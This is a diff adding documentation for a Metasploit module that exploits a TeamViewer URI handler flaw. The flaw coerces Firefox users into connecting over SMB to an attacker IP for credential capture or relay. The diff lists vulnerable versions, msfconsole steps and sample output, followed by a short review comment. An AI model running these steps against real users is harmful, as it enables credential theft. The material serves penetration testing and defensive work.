documentation/modules/auxiliary/server/teamviewer_uri_smb_redirect.md

```diff
@@ -0,0 +1,126 @@
+## Vulnerable Application
+
+This module exploits an unquoted parameter call within the
+Teamviewer URI handler to create an SMB connection to an attacker
+controlled IP.
+
+TeamViewer < 8.0.258861, 9.0.258860, 10.0.258873,
+11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and
+15.8.3 are vulnerable.
+
+Only Firefox can be exploited by this
+vulnerability, as all other browsers encode the space after 'play'
+and before the SMB location, preventing successful exploitation.
+
+Teamviewer 15.4.4445 was succssfully tested against.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/server/teamviewer_uri_smb_redirect`
+1. Do: `set SMB_SERVER [IP]`
+1. Do: `run`
+1. Start an SMB Capture or Relay server (such as responder)
+1. Open the URL on the target
+1. The SMB Server should receive a connection.
+
+## Options
+
+### FILE_NAME
+
+The SMB file to link to.  This is an arbitrary file name.  Default is `\\teamviewer\\config.tv`
+
+### SMB_SERVER
+
+The SMB server IP address.
+
+### URI_HANDLER
+
+The URI Handler to use.  Typically the default `teamviewer10`
+
+## Scenarios
+
+### TeamViewer 15.4.4445 on Windows 10 1909 with Firefox 79
+
+```
+[*] Processing teamviewer.rb for ERB directives.
+resource (teamviewer.rb)> use auxiliary/server/teamviewer_uri_smb_redirect
+resource (teamviewer.rb)> set smb_server 2.2.2.2
+smb_server => 2.2.2.2
+resource (teamviewer.rb)> run -j
+[*] Auxiliary module running as background job 0.
+[+] Please start an SMB capture/relay on 2.2.2.2
+[*] Using URL: http://0.0.0.0:8080/IDGynsGNfXD5eFB
+[*] Local IP: http://1.1.1.1:8080/IDGynsGNfXD5eFB
+[*] Server started.
+```
+
+Start the SMB replay/capture
```

Comment:
Why not use `modules/auxiliary/server/capture/smb.rb` ?

Reply:
SMB3 **server** doesn't exist for msf yet, and win10 1909 only connected through that.